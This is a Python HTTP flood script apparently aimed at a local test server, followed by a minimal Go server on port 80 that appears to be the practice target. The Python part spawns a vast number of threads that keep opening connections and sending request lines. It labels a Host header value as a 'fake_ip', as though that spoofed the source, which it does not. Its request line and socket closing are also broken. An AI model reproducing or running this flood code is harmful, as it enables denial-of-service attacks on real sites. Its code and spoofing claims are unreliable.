import socket
import threading

target = '127.0.0.1'
fake_ip = '182.21.20.32'
port = 80
attack_num =0

def attack():
    while True:
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect((target,port))
        s.sendto(("GET/"+target+"Http/1.1\r\n").encode('ascii'),(target,port))
        s.sendto(("Host:"+fake_ip+"\r\n\r\n").encode('ascii'),(target,port))
        
        global attack_num
        attack_num= attack_num + 1
        print(attack_num)
        s.close
for i in range(95674123987456):
    thread = threading.Thread(target=attack)
    thread.start()        

package main
import (
"fmt"
"net/http"
)
func main(){
http.HandleFunc("/test-server",func(rw http.ResponseWriter,r *http.Request){
fmt.Fprintf(rw,"\n this is a test server\n")
})
http.ListenAndServe(":80",nil)
}

